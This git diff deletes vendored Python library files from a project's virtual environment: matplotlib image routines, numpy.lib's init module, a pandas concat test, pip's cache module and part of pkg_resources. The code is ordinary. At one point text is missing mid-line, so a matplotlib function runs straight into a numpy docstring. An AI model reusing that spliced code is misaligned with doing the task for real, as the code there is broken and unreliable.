bbox, - *, - cmap=None, - norm=None, - interpolation=None, - origin=None, - filternorm=True, - filterrad=4.0, - resample=False, - **kwargs - ): - """ - cmap is a colors.Colormap instance - norm is a colors.Normalize instance to map luminance to 0-1 - - kwargs are an optional list of Artist keyword args - """ - super().__init__( - None, - cmap=cmap, - norm=norm, - interpolation=interpolation, - origin=origin, - filternorm=filternorm, - filterrad=filterrad, - resample=resample, - **kwargs - ) - self.bbox = bbox - - def get_window_extent(self, renderer=None): - if renderer is None: - renderer = self.get_figure()._get_renderer() - - if isinstance(self.bbox, BboxBase): - return self.bbox - elif callable(self.bbox): - return self.bbox(renderer) - else: - raise ValueError("Unknown type of bbox") - - def contains(self, mouseevent): - """Test whether the mouse event occurred within the image.""" - if self._different_canvas(mouseevent) or not self.get_visible(): - return False, {} - x, y = mouseevent.x, mouseevent.y - inside = self.get_window_extent().contains(x, y) - return inside, {} - - def make_image(self, renderer, magnification=1.0, unsampled=False): - # 
docstring inherited - width, height = renderer.get_canvas_width_height() - bbox_in = self.get_window_extent(renderer).frozen() - bbox_in._points /= [width, height] - bbox_out = self.get_window_extent(renderer) - clip = Bbox([[0, 0], [width, height]]) - self._transform = BboxTransformTo(clip) - return self._make_image( - self._A, - bbox_in, bbox_out, clip, magnification, unsampled=unsampled) - - -def imread(fname, format=None): - """ - Read an image from a file into an array. - - .. note:: - - This function exists for historical reasons. It is recommended to - use `PIL.Image.open` instead for loading images. - - Parameters - ---------- - fname : str or file-like - The image file to read: a filename, a URL or a file-like object opened - in read-binary mode. - - Passing a URL is deprecated. Please open the URL - for reading and pass the result to Pillow, e.g. with - ``np.array(PIL.Image.open(urllib.request.urlopen(url)))``. - format : str, optional - The image file format assumed for reading the data. The image is - loaded as a PNG file if *format* is set to "png", if *fname* is a path - or opened file with a ".png" extension, or if it is a URL. In all - other cases, *format* is ignored and the format is auto-detected by - `PIL.Image.open`. - - Returns - ------- - `numpy.array` - The image data. The returned array has shape - - - (M, N) for grayscale images. - - (M, N, 3) for RGB images. - - (M, N, 4) for RGBA images. - - PNG images are returned as float arrays (0-1). All other formats are - returned as int arrays, with a bit depth determined by the file's - contents. - """ - # hide imports to speed initial import on systems with slow linkers - from urllib import parse - - if format is None: - if isinstance(fname, str): - parsed = parse.urlparse(fname) - # If the string is a URL (Windows paths appear as if they have a - # length-1 scheme), assume png. - if len(parsed.scheme) > 1: - ext = 'png' - else: - ext = Path(fname).suffix.lower()[1:] - elif hasattr(fname, 'geturl'): # Returned by urlopen(). - # We could try to parse the url's path and use the extension, but - # returning png is consistent with the block above. Note that this - # if clause has to come before checking for fname.name as - # urlopen("file:///...") also has a name attribute (with the fixed - # value ""). - ext = 'png' - elif hasattr(fname, 'name'): - ext = Path(fname.name).suffix.lower()[1:] - else: - ext = 'png' - else: - ext = format - img_open = ( - PIL.PngImagePlugin.PngImageFile if ext == 'png' else PIL.Image.open) - if isinstance(fname, str) and len(parse.urlparse(fname).scheme) > 1: - # Pillow doesn't handle URLs directly. - raise ValueError( - "Please open the URL for reading and pass the " - "result to Pillow, e.g. with " - "``np.array(PIL.Image.open(urllib.request.urlopen(url)))``." - ) - with img_open(fname) as image: - return (_pil_png_to_float_array(image) - if isinstance(image, PIL.PngImagePlugin.PngImageFile) else - pil_to_array(image)) - - -def imsave(fname, arr, vmin=None, vmax=None, cmap=None, format=None, - origin=None, dpi=100, *, metadata=None, pil_kwargs=None): - """ - Colormap and save an array as an image file. - - RGB(A) images are passed through. Single channel images will be - colormapped according to *cmap* and *norm*. - - .. note:: - - If you want to save a single channel image as gray scale please use an - image I/O library (such as pillow, tifffile, or imageio) directly. - - Parameters - ---------- - fname : str or path-like or file-like - A path or a file-like object to store the image in. 
- If *format* is not set, then the output format is inferred from the - extension of *fname*, if any, and from :rc:`savefig.format` otherwise. - If *format* is set, it determines the output format. - arr : array-like - The image data. The shape can be one of - MxN (luminance), MxNx3 (RGB) or MxNx4 (RGBA). - vmin, vmax : float, optional - *vmin* and *vmax* set the color scaling for the image by fixing the - values that map to the colormap color limits. If either *vmin* - or *vmax* is None, that limit is determined from the *arr* - min/max value. - cmap : str or `~matplotlib.colors.Colormap`, default: :rc:`image.cmap` - A Colormap instance or registered colormap name. The colormap - maps scalar data to colors. It is ignored for RGB(A) data. - format : str, optional - The file format, e.g. 'png', 'pdf', 'svg', ... The behavior when this - is unset is documented under *fname*. - origin : {'upper', 'lower'}, default: :rc:`image.origin` - Indicates whether the ``(0, 0)`` index of the array is in the upper - left or lower left corner of the axes. - dpi : float - The DPI to store in the metadata of the file. This does not affect the - resolution of the output image. Depending on file format, this may be - rounded to the nearest integer. - metadata : dict, optional - Metadata in the image file. The supported keys depend on the output - format, see the documentation of the respective backends for more - information. - Currently only supported for "png", "pdf", "ps", "eps", and "svg". - pil_kwargs : dict, optional - Keyword arguments passed to `PIL.Image.Image.save`. If the 'pnginfo' - key is present, it completely overrides *metadata*, including the - default 'Software' key. - """ - from matplotlib.figure import Figure - if isinstance(fname, os.PathLike): - fname = os.fspath(fname) - if format is None: - format = (Path(fname).suffix[1:] if isinstance(fname, str) - else mpl.rcParams["savefig.format"]).lower() - if format in ["pdf", "ps", "eps", "svg"]: - # Vector formats that are not handled by PIL. - if pil_kwargs is not None: - raise ValueError( - f"Cannot use 'pil_kwargs' when saving to {format}") - fig = Figure(dpi=dpi, frameon=False) - fig.figimage(arr, cmap=cmap, vmin=vmin, vmax=vmax, origin=origin, - resize=True) - fig.savefig(fname, dpi=dpi, format=format, transparent=True, - metadata=metadata) - else: - # Don't bother creating an image; this avoids rounding errors on the - # size when dividing and then multiplying by dpi. - if origin is None: - origin = mpl.rcParams["image.origin"] - else: - _api.check_in_list(('upper', 'lower'), origin=origin) - if origin == "lower": - arr = arr[::-1] - if (isinstance(arr, memoryview) and arr.format == "B" - and arr.ndim == 3 and arr.shape[-1] == 4): - # Such an ``arr`` would also be handled fine by sm.to_rgba below - # (after casting with asarray), but it is useful to special-case it - # because that's what backend_agg passes, and can be in fact used - # as is, saving a few operations. - rgba = arr - else: - sm = cm.ScalarMappable(cmap=cmap) - sm.set_clim(vmin, vmax) - rgba = sm.to_rgba(arr, bytes=True) - if pil_kwargs is None: - pil_kwargs = {} - else: - # we modify this below, so make a copy (don't modify caller's dict) - pil_kwargs = pil_kwargs.copy() - pil_shape = (rgba.shape[1], rgba.shape[0]) - image = PIL.Image.frombuffer( - "RGBA", pil_shape, rgba, "raw", "RGBA", 0, 1) - if format == "png": - # Only use the metadata kwarg if pnginfo is not set, because the - # semantics of duplicate keys in pnginfo is unclear. 
- if "pnginfo" in pil_kwargs: - if metadata: - _api.warn_external("'metadata' is overridden by the " - "'pnginfo' entry in 'pil_kwargs'.") - else: - metadata = { - "Software": (f"Matplotlib version{mpl.__version__}, " - f"https://matplotlib.org/"), - **(metadata if metadata is not None else {}), - } - pil_kwargs["pnginfo"] = pnginfo = PIL.PngImagePlugin.PngInfo() - for k, v in metadata.items(): - if v is not None: - pnginfo.add_text(k, v) - elif metadata is not None: - raise ValueError(f"metadata not supported for format {format!r}") - if format in ["jpg", "jpeg"]: - format = "jpeg" # Pillow doesn't recognize "jpg". - facecolor = mpl.rcParams["savefig.facecolor"] - if cbook._str_equal(facecolor, "auto"): - facecolor = mpl.rcParams["figure.facecolor"] - color = tuple(int(x * 255) for x in mcolors.to_rgb(facecolor)) - background = PIL.Image.new("RGB", pil_shape, color) - background.paste(image, image) - image = background - pil_kwargs.setdefault("format", format) - pil_kwargs.setdefault("dpi", (dpi, dpi)) - image.save(fname, **pil_kwargs) - - -def pil_to_array(pilImage): - """ - Load a `PIL image`_ and return it as a numpy int array. - - .. _PIL image: https://pillow.readthedocs.io/en/latest/reference/Image.html - - Returns - ------- - numpy.array - - The array shape depends on the image type: - - - (M, N) for grayscale images. - - (M, N, 3) for RGB images. - - (M, N, 4) for RGBA images. - """ - if pilImage.mode in ['RGBA', 'RGBX', 'RGB', 'L']: - # return MxNx4 RGBA, MxNx3 RBA, or MxN luminance array - return np.asarray(pilImage) - elif pilImage.mode.startswith('I;16'): - # return MxN luminance array of uint16 - raw = pilImage.tobytes('raw', pilImage.mode) - if pilImage.mode.endswith('B'): - x = np.frombuffer(raw, '>u2') - else: - x = np.frombuffer(raw, '`` where possible. - -``numpy.lib`` is mostly a space for implementing functions that don't -belong in core or in another NumPy submodule with a clear purpose -(e.g. ``random``, ``fft``, ``linalg``, ``ma``). - -Most contains basic functions that are used by several submodules and are -useful to have in the main name-space. - -""" - -# Public submodules -# Note: recfunctions and (maybe) format are public too, but not imported -from . import mixins -from . import scimath as emath - -# Private submodules -# load module names. See https://github.com/networkx/networkx/issues/5838 -from . import type_check -from . import index_tricks -from . import function_base -from . import nanfunctions -from . import shape_base -from . import stride_tricks -from . import twodim_base -from . import ufunclike -from . import histograms -from . import polynomial -from . import utils -from . import arraysetops -from . import npyio -from . import arrayterator -from . import arraypad -from . 
import _version - -from .type_check import * -from .index_tricks import * -from .function_base import * -from .nanfunctions import * -from .shape_base import * -from .stride_tricks import * -from .twodim_base import * -from .ufunclike import * -from .histograms import * - -from .polynomial import * -from .utils import * -from .arraysetops import * -from .npyio import * -from .arrayterator import Arrayterator -from .arraypad import * -from ._version import * -from numpy.core._multiarray_umath import tracemalloc_domain - -__all__ = ['emath', 'tracemalloc_domain', 'Arrayterator'] -__all__ += type_check.__all__ -__all__ += index_tricks.__all__ -__all__ += function_base.__all__ -__all__ += shape_base.__all__ -__all__ += stride_tricks.__all__ -__all__ += twodim_base.__all__ -__all__ += ufunclike.__all__ -__all__ += arraypad.__all__ -__all__ += polynomial.__all__ -__all__ += utils.__all__ -__all__ += arraysetops.__all__ -__all__ += npyio.__all__ -__all__ += nanfunctions.__all__ -__all__ += histograms.__all__ - -from numpy._pytesttester import PytestTester -test = PytestTester(__name__) -del PytestTester - -def __getattr__(attr): - # Warn for reprecated attributes - import math - import warnings - - if attr == 'math': - warnings.warn( - "`np.lib.math` is a deprecated alias for the standard library " - "`math` module (Deprecated Numpy 1.25). Replace usages of " - "`numpy.lib.math` with `math`", DeprecationWarning, stacklevel=2) - return math - else: - raise AttributeError("module {!r} has no attribute " - "{!r}".format(__name__, attr)) - diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/tests/reshape/concat/test_sort.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/tests/reshape/concat/test_sort.py deleted file mode 100644 index 2724f819588933cc307dd396fdcd024f04c38eaa..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/tests/reshape/concat/test_sort.py +++ /dev/null @@ -1,118 +0,0 @@ -import numpy as np -import pytest - -import pandas as pd -from pandas import DataFrame -import pandas._testing as tm - - -class TestConcatSort: - def test_concat_sorts_columns(self, sort): - # GH-4588 - df1 = DataFrame({"a": [1, 2], "b": [1, 2]}, columns=["b", "a"]) - df2 = DataFrame({"a": [3, 4], "c": [5, 6]}) - - # for sort=True/None - expected = DataFrame( - {"a": [1, 2, 3, 4], "b": [1, 2, None, None], "c": [None, None, 5, 6]}, - columns=["a", "b", "c"], - ) - - if sort is False: - expected = expected[["b", "a", "c"]] - - # default - with tm.assert_produces_warning(None): - result = pd.concat([df1, df2], ignore_index=True, sort=sort) - tm.assert_frame_equal(result, expected) - - def test_concat_sorts_index(self, sort): - df1 = DataFrame({"a": [1, 2, 3]}, index=["c", "a", "b"]) - df2 = DataFrame({"b": [1, 2]}, index=["a", "b"]) - - # For True/None - expected = DataFrame( - {"a": [2, 3, 1], "b": [1, 2, None]}, - index=["a", "b", "c"], - columns=["a", "b"], - ) - if sort is False: - expected = expected.loc[["c", "a", "b"]] - - # Warn and sort by default - with tm.assert_produces_warning(None): - result = pd.concat([df1, df2], axis=1, sort=sort) - tm.assert_frame_equal(result, expected) - - def test_concat_inner_sort(self, sort): - # https://github.com/pandas-dev/pandas/pull/20613 - df1 = DataFrame( - {"a": [1, 2], "b": [1, 2], "c": [1, 2]}, columns=["b", "a", "c"] - ) - df2 = DataFrame({"a": [1, 2], "b": [3, 4]}, index=[3, 4]) - - with tm.assert_produces_warning(None): - # unset sort should 
*not* warn for inner join - # since that never sorted - result = pd.concat([df1, df2], sort=sort, join="inner", ignore_index=True) - - expected = DataFrame({"b": [1, 2, 3, 4], "a": [1, 2, 1, 2]}, columns=["b", "a"]) - if sort is True: - expected = expected[["a", "b"]] - tm.assert_frame_equal(result, expected) - - def test_concat_aligned_sort(self): - # GH-4588 - df = DataFrame({"c": [1, 2], "b": [3, 4], "a": [5, 6]}, columns=["c", "b", "a"]) - result = pd.concat([df, df], sort=True, ignore_index=True) - expected = DataFrame( - {"a": [5, 6, 5, 6], "b": [3, 4, 3, 4], "c": [1, 2, 1, 2]}, - columns=["a", "b", "c"], - ) - tm.assert_frame_equal(result, expected) - - result = pd.concat( - [df, df[["c", "b"]]], join="inner", sort=True, ignore_index=True - ) - expected = expected[["b", "c"]] - tm.assert_frame_equal(result, expected) - - def test_concat_aligned_sort_does_not_raise(self): - # GH-4588 - # We catch TypeErrors from sorting internally and do not re-raise. - df = DataFrame({1: [1, 2], "a": [3, 4]}, columns=[1, "a"]) - expected = DataFrame({1: [1, 2, 1, 2], "a": [3, 4, 3, 4]}, columns=[1, "a"]) - result = pd.concat([df, df], ignore_index=True, sort=True) - tm.assert_frame_equal(result, expected) - - def test_concat_frame_with_sort_false(self): - # GH 43375 - result = pd.concat( - [DataFrame({i: i}, index=[i]) for i in range(2, 0, -1)], sort=False - ) - expected = DataFrame([[2, np.nan], [np.nan, 1]], index=[2, 1], columns=[2, 1]) - - tm.assert_frame_equal(result, expected) - - # GH 37937 - df1 = DataFrame({"a": [1, 2, 3], "b": [4, 5, 6]}, index=[1, 2, 3]) - df2 = DataFrame({"c": [7, 8, 9], "d": [10, 11, 12]}, index=[3, 1, 6]) - result = pd.concat([df2, df1], axis=1, sort=False) - expected = DataFrame( - [ - [7.0, 10.0, 3.0, 6.0], - [8.0, 11.0, 1.0, 4.0], - [9.0, 12.0, np.nan, np.nan], - [np.nan, np.nan, 2.0, 5.0], - ], - index=[3, 1, 6, 2], - columns=["c", "d", "a", "b"], - ) - tm.assert_frame_equal(result, expected) - - def test_concat_sort_none_raises(self): - # GH#41518 - df = DataFrame({1: [1, 2], "a": [3, 4]}) - msg = "The 'sort' keyword only accepts boolean values; None was passed." - with pytest.raises(ValueError, match=msg): - pd.concat([df, df], sort=None) diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_internal/network/cache.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_internal/network/cache.py deleted file mode 100644 index 9dba7edf9cd34f5cc881fee9b08c674d2999c3da..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_internal/network/cache.py +++ /dev/null @@ -1,69 +0,0 @@ -"""HTTP cache implementation. -""" - -import os -from contextlib import contextmanager -from typing import Iterator, Optional - -from pip._vendor.cachecontrol.cache import BaseCache -from pip._vendor.cachecontrol.caches import FileCache -from pip._vendor.requests.models import Response - -from pip._internal.utils.filesystem import adjacent_tmp_file, replace -from pip._internal.utils.misc import ensure_dir - - -def is_from_cache(response: Response) -> bool: - return getattr(response, "from_cache", False) - - -@contextmanager -def suppressed_cache_errors() -> Iterator[None]: - """If we can't access the cache then we can just skip caching and process - requests as if caching wasn't enabled. - """ - try: - yield - except OSError: - pass - - -class SafeFileCache(BaseCache): - """ - A file based cache which is safe to use even when the target directory may - not be accessible or writable. 
- """ - - def __init__(self, directory: str) -> None: - assert directory is not None, "Cache directory must not be None." - super().__init__() - self.directory = directory - - def _get_cache_path(self, name: str) -> str: - # From cachecontrol.caches.file_cache.FileCache._fn, brought into our - # class for backwards-compatibility and to avoid using a non-public - # method. - hashed = FileCache.encode(name) - parts = list(hashed[:5]) + [hashed] - return os.path.join(self.directory, *parts) - - def get(self, key: str) -> Optional[bytes]: - path = self._get_cache_path(key) - with suppressed_cache_errors(): - with open(path, "rb") as f: - return f.read() - - def set(self, key: str, value: bytes, expires: Optional[int] = None) -> None: - path = self._get_cache_path(key) - with suppressed_cache_errors(): - ensure_dir(os.path.dirname(path)) - - with adjacent_tmp_file(path) as f: - f.write(value) - - replace(f.name, path) - - def delete(self, key: str) -> None: - path = self._get_cache_path(key) - with suppressed_cache_errors(): - os.remove(path) diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_vendor/pkg_resources/__init__.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_vendor/pkg_resources/__init__.py deleted file mode 100644 index 4cd562cf94c6d16f6b2b49b38549db9b914a6178..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_vendor/pkg_resources/__init__.py +++ /dev/null @@ -1,3296 +0,0 @@ -# coding: utf-8 -""" -Package resource API --------------------- - -A resource is a logical file contained within a package, or a logical -subdirectory thereof. The package resource API expects resource names -to have their path parts separated with ``/``, *not* whatever the local -path separator is. Do not use os.path operations to manipulate resource -names being passed into the API. - -The package resource API is designed to work with normal filesystem packages, -.egg files, and unpacked .egg files. It can also work in a limited way with -.zip files and with custom PEP 302 loaders that support the ``get_data()`` -method. -""" - -from __future__ import absolute_import - -import sys -import os -import io -import time -import re -import types -import zipfile -import zipimport -import warnings -import stat -import functools -import pkgutil -import operator -import platform -import collections -import plistlib -import email.parser -import errno -import tempfile -import textwrap -import itertools -import inspect -import ntpath -import posixpath -from pkgutil import get_importer - -try: - import _imp -except ImportError: - # Python 3.2 compatibility - import imp as _imp - -try: - FileExistsError -except NameError: - FileExistsError = OSError - -from pip._vendor import six -from pip._vendor.six.moves import urllib, map, filter - -# capture these to bypass sandboxing -from os import utime -try: - from os import mkdir, rename, unlink - WRITE_SUPPORT = True -except ImportError: - # no write support, probably under GAE - WRITE_SUPPORT = False - -from os import open as os_open -from os.path import isdir, split - -try: - import importlib.machinery as importlib_machinery - # access attribute to force import under delayed import mechanisms. - importlib_machinery.__name__ -except ImportError: - importlib_machinery = None - -from . 
import py31compat -from pip._vendor import platformdirs -from pip._vendor import packaging -__import__('pip._vendor.packaging.version') -__import__('pip._vendor.packaging.specifiers') -__import__('pip._vendor.packaging.requirements') -__import__('pip._vendor.packaging.markers') - - -__metaclass__ = type - - -if (3, 0) < sys.version_info < (3, 5): - raise RuntimeError("Python 3.5 or later is required") - -if six.PY2: - # Those builtin exceptions are only defined in Python 3 - PermissionError = None - NotADirectoryError = None - -# declare some globals that will be defined later to -# satisfy the linters. -require = None -working_set = None -add_activation_listener = None -resources_stream = None -cleanup_resources = None -resource_dir = None -resource_stream = None -set_extraction_path = None -resource_isdir = None -resource_string = None -iter_entry_points = None -resource_listdir = None -resource_filename = None -resource_exists = None -_distribution_finders = None -_namespace_handlers = None -_namespace_packages = None - - -class PEP440Warning(RuntimeWarning): - """ - Used when there is an issue with a version or specifier not complying with - PEP 440. - """ - - -def parse_version(v): - try: - return packaging.version.Version(v) - except packaging.version.InvalidVersion: - return packaging.version.LegacyVersion(v) - - -_state_vars = {} - - -def _declare_state(vartype, **kw): - globals().update(kw) - _state_vars.update(dict.fromkeys(kw, vartype)) - - -def __getstate__(): - state = {} - g = globals() - for k, v in _state_vars.items(): - state[k] = g['_sget_' + v](g[k]) - return state - - -def __setstate__(state): - g = globals() - for k, v in state.items(): - g['_sset_' + _state_vars[k]](k, g[k], v) - return state - - -def _sget_dict(val): - return val.copy() - - -def _sset_dict(key, ob, state): - ob.clear() - ob.update(state) - - -def _sget_object(val): - return val.__getstate__() - - -def _sset_object(key, ob, state): - ob.__setstate__(state) - - -_sget_none = _sset_none = lambda *args: None - - -def get_supported_platform(): - """Return this platform's maximum compatible version. - - distutils.util.get_platform() normally reports the minimum version - of Mac OS X that would be required to *use* extensions produced by - distutils. But what we want when checking compatibility is to know the - version of Mac OS X that we are *running*. To allow usage of packages that - explicitly require a newer version of Mac OS X, we must also know the - current version of the OS. - - If this condition occurs for any other platform with a version in its - platform strings, this function should be extended accordingly. 
- """ - plat = get_build_platform() - m = macosVersionString.match(plat) - if m is not None and sys.platform == "darwin": - try: - plat = 'macosx-%s-%s' % ('.'.join(_macosx_vers()[:2]), m.group(3)) - except ValueError: - # not Mac OS X - pass - return plat - - -__all__ = [ - # Basic resource access and distribution/entry point discovery - 'require', 'run_script', 'get_provider', 'get_distribution', - 'load_entry_point', 'get_entry_map', 'get_entry_info', - 'iter_entry_points', - 'resource_string', 'resource_stream', 'resource_filename', - 'resource_listdir', 'resource_exists', 'resource_isdir', - - # Environmental control - 'declare_namespace', 'working_set', 'add_activation_listener', - 'find_distributions', 'set_extraction_path', 'cleanup_resources', - 'get_default_cache', - - # Primary implementation classes - 'Environment', 'WorkingSet', 'ResourceManager', - 'Distribution', 'Requirement', 'EntryPoint', - - # Exceptions - 'ResolutionError', 'VersionConflict', 'DistributionNotFound', - 'UnknownExtra', 'ExtractionError', - - # Warnings - 'PEP440Warning', - - # Parsing functions and string utilities - 'parse_requirements', 'parse_version', 'safe_name', 'safe_version', - 'get_platform', 'compatible_platforms', 'yield_lines', 'split_sections', - 'safe_extra', 'to_filename', 'invalid_marker', 'evaluate_marker', - - # filesystem utilities - 'ensure_directory', 'normalize_path', - - # Distribution "precedence" constants - 'EGG_DIST', 'BINARY_DIST', 'SOURCE_DIST', 'CHECKOUT_DIST', 'DEVELOP_DIST', - - # "Provider" interfaces, implementations, and registration/lookup APIs - 'IMetadataProvider', 'IResourceProvider', 'FileMetadata', - 'PathMetadata', 'EggMetadata', 'EmptyProvider', 'empty_provider', - 'NullProvider', 'EggProvider', 'DefaultProvider', 'ZipProvider', - 'register_finder', 'register_namespace_handler', 'register_loader_type', - 'fixup_namespace_packages', 'get_importer', - - # Warnings - 'PkgResourcesDeprecationWarning', - - # Deprecated/backward compatibility only - 'run_main', 'AvailableDistributions', -] - - -class ResolutionError(Exception): - """Abstract base for dependency resolution errors""" - - def __repr__(self): - return self.__class__.__name__ + repr(self.args) - - -class VersionConflict(ResolutionError): - """ - An already-installed version conflicts with the requested version. - - Should be initialized with the installed Distribution and the requested - Requirement. - """ - - _template = "{self.dist} is installed but {self.req} is required" - - @property - def dist(self): - return self.args[0] - - @property - def req(self): - return self.args[1] - - def report(self): - return self._template.format(**locals()) - - def with_context(self, required_by): - """ - If required_by is non-empty, return a version of self that is a - ContextualVersionConflict. - """ - if not required_by: - return self - args = self.args + (required_by,) - return ContextualVersionConflict(*args) - - -class ContextualVersionConflict(VersionConflict): - """ - A VersionConflict that accepts a third parameter, the set of the - requirements that required the installed Distribution. 
- """ - - _template = VersionConflict._template + ' by {self.required_by}' - - @property - def required_by(self): - return self.args[2] - - -class DistributionNotFound(ResolutionError): - """A requested distribution was not found""" - - _template = ("The '{self.req}' distribution was not found " - "and is required by {self.requirers_str}") - - @property - def req(self): - return self.args[0] - - @property - def requirers(self): - return self.args[1] - - @property - def requirers_str(self): - if not self.requirers: - return 'the application' - return ', '.join(self.requirers) - - def report(self): - return self._template.format(**locals()) - - def __str__(self): - return self.report() - - -class UnknownExtra(ResolutionError): - """Distribution doesn't have an "extra feature" of the given name""" - - -_provider_factories = {} - -PY_MAJOR = '{}.{}'.format(*sys.version_info) -EGG_DIST = 3 -BINARY_DIST = 2 -SOURCE_DIST = 1 -CHECKOUT_DIST = 0 -DEVELOP_DIST = -1 - - -def register_loader_type(loader_type, provider_factory): - """Register `provider_factory` to make providers for `loader_type` - - `loader_type` is the type or class of a PEP 302 ``module.__loader__``, - and `provider_factory` is a function that, passed a *module* object, - returns an ``IResourceProvider`` for that module. - """ - _provider_factories[loader_type] = provider_factory - - -def get_provider(moduleOrReq): - """Return an IResourceProvider for the named module or requirement""" - if isinstance(moduleOrReq, Requirement): - return working_set.find(moduleOrReq) or require(str(moduleOrReq))[0] - try: - module = sys.modules[moduleOrReq] - except KeyError: - __import__(moduleOrReq) - module = sys.modules[moduleOrReq] - loader = getattr(module, '__loader__', None) - return _find_adapter(_provider_factories, loader)(module) - - -def _macosx_vers(_cache=[]): - if not _cache: - version = platform.mac_ver()[0] - # fallback for MacPorts - if version == '': - plist = '/System/Library/CoreServices/SystemVersion.plist' - if os.path.exists(plist): - if hasattr(plistlib, 'readPlist'): - plist_content = plistlib.readPlist(plist) - if 'ProductVersion' in plist_content: - version = plist_content['ProductVersion'] - - _cache.append(version.split('.')) - return _cache[0] - - -def _macosx_arch(machine): - return {'PowerPC': 'ppc', 'Power_Macintosh': 'ppc'}.get(machine, machine) - - -def get_build_platform(): - """Return this platform's string for platform-specific distributions - - XXX Currently this is the same as ``distutils.util.get_platform()``, but it - needs some hacks for Linux and Mac OS X. - """ - from sysconfig import get_platform - - plat = get_platform() - if sys.platform == "darwin" and not plat.startswith('macosx-'): - try: - version = _macosx_vers() - machine = os.uname()[4].replace(" ", "_") - return "macosx-%d.%d-%s" % ( - int(version[0]), int(version[1]), - _macosx_arch(machine), - ) - except ValueError: - # if someone is running a non-Mac darwin system, this will fall - # through to the default implementation - pass - return plat - - -macosVersionString = re.compile(r"macosx-(\d+)\.(\d+)-(.*)") -darwinVersionString = re.compile(r"darwin-(\d+)\.(\d+)\.(\d+)-(.*)") -# XXX backward compat -get_platform = get_build_platform - - -def compatible_platforms(provided, required): - """Can code for the `provided` platform run on the `required` platform? - - Returns true if either platform is ``None``, or the platforms are equal. - - XXX Needs compatibility checks for Linux and other unixy OSes. 
- """ - if provided is None or required is None or provided == required: - # easy case - return True - - # Mac OS X special cases - reqMac = macosVersionString.match(required) - if reqMac: - provMac = macosVersionString.match(provided) - - # is this a Mac package? - if not provMac: - # this is backwards compatibility for packages built before - # setuptools 0.6. All packages built after this point will - # use the new macosx designation. - provDarwin = darwinVersionString.match(provided) - if provDarwin: - dversion = int(provDarwin.group(1)) - macosversion = "%s.%s" % (reqMac.group(1), reqMac.group(2)) - if dversion == 7 and macosversion >= "10.3" or \ - dversion == 8 and macosversion >= "10.4": - return True - # egg isn't macosx or legacy darwin - return False - - # are they the same major version and machine type? - if provMac.group(1) != reqMac.group(1) or \ - provMac.group(3) != reqMac.group(3): - return False - - # is the required OS major update >= the provided one? - if int(provMac.group(2)) > int(reqMac.group(2)): - return False - - return True - - # XXX Linux and other platforms' special cases should go here - return False - - -def run_script(dist_spec, script_name): - """Locate distribution `dist_spec` and run its `script_name` script""" - ns = sys._getframe(1).f_globals - name = ns['__name__'] - ns.clear() - ns['__name__'] = name - require(dist_spec)[0].run_script(script_name, ns) - - -# backward compatibility -run_main = run_script - - -def get_distribution(dist): - """Return a current distribution object for a Requirement or string""" - if isinstance(dist, six.string_types): - dist = Requirement.parse(dist) - if isinstance(dist, Requirement): - dist = get_provider(dist) - if not isinstance(dist, Distribution): - raise TypeError("Expected string, Requirement, or Distribution", dist) - return dist - - -def load_entry_point(dist, group, name): - """Return `name` entry point of `group` for `dist` or raise ImportError""" - return get_distribution(dist).load_entry_point(group, name) - - -def get_entry_map(dist, group=None): - """Return the entry point map for `group`, or the full entry map""" - return get_distribution(dist).get_entry_map(group) - - -def get_entry_info(dist, group, name): - """Return the EntryPoint object for `group`+`name`, or ``None``""" - return get_distribution(dist).get_entry_info(group, name) - - -class IMetadataProvider: - def has_metadata(name): - """Does the package's distribution contain the named metadata?""" - - def get_metadata(name): - """The named metadata resource as a string""" - - def get_metadata_lines(name): - """Yield named metadata resource as list of non-blank non-comment lines - - Leading and trailing whitespace is stripped from each line, and lines - with ``#`` as the first non-blank character are omitted.""" - - def metadata_isdir(name): - """Is the named metadata a directory? 
(like ``os.path.isdir()``)""" - - def metadata_listdir(name): - """List of metadata names in the directory (like ``os.listdir()``)""" - - def run_script(script_name, namespace): - """Execute the named script in the supplied namespace dictionary""" - - -class IResourceProvider(IMetadataProvider): - """An object that provides access to package resources""" - - def get_resource_filename(manager, resource_name): - """Return a true filesystem path for `resource_name` - - `manager` must be an ``IResourceManager``""" - - def get_resource_stream(manager, resource_name): - """Return a readable file-like object for `resource_name` - - `manager` must be an ``IResourceManager``""" - - def get_resource_string(manager, resource_name): - """Return a string containing the contents of `resource_name` - - `manager` must be an ``IResourceManager``""" - - def has_resource(resource_name): - """Does the package contain the named resource?""" - - def resource_isdir(resource_name): - """Is the named resource a directory? (like ``os.path.isdir()``)""" - - def resource_listdir(resource_name): - """List of resource names in the directory (like ``os.listdir()``)""" - - -class WorkingSet: - """A collection of active distributions on sys.path (or a similar list)""" - - def __init__(self, entries=None): - """Create working set from list of path entries (default=sys.path)""" - self.entries = [] - self.entry_keys = {} - self.by_key = {} - self.callbacks = [] - - if entries is None: - entries = sys.path - - for entry in entries: - self.add_entry(entry) - - @classmethod - def _build_master(cls): - """ - Prepare the master working set. - """ - ws = cls() - try: - from __main__ import __requires__ - except ImportError: - # The main program does not list any requirements - return ws - - # ensure the requirements are met - try: - ws.require(__requires__) - except VersionConflict: - return cls._build_from_requirements(__requires__) - - return ws - - @classmethod - def _build_from_requirements(cls, req_spec): - """ - Build a working set from a requirement spec. Rewrites sys.path. - """ - # try it without defaults already on sys.path - # by starting with an empty path - ws = cls([]) - reqs = parse_requirements(req_spec) - dists = ws.resolve(reqs, Environment()) - for dist in dists: - ws.add(dist) - - # add any missing entries from sys.path - for entry in sys.path: - if entry not in ws.entries: - ws.add_entry(entry) - - # then copy back to sys.path - sys.path[:] = ws.entries - return ws - - def add_entry(self, entry): - """Add a path item to ``.entries``, finding any distributions on it - - ``find_distributions(entry, True)`` is used to find distributions - corresponding to the path entry, and they are added. `entry` is - always appended to ``.entries``, even if it is already present. - (This is because ``sys.path`` can contain the same value more than - once, and the 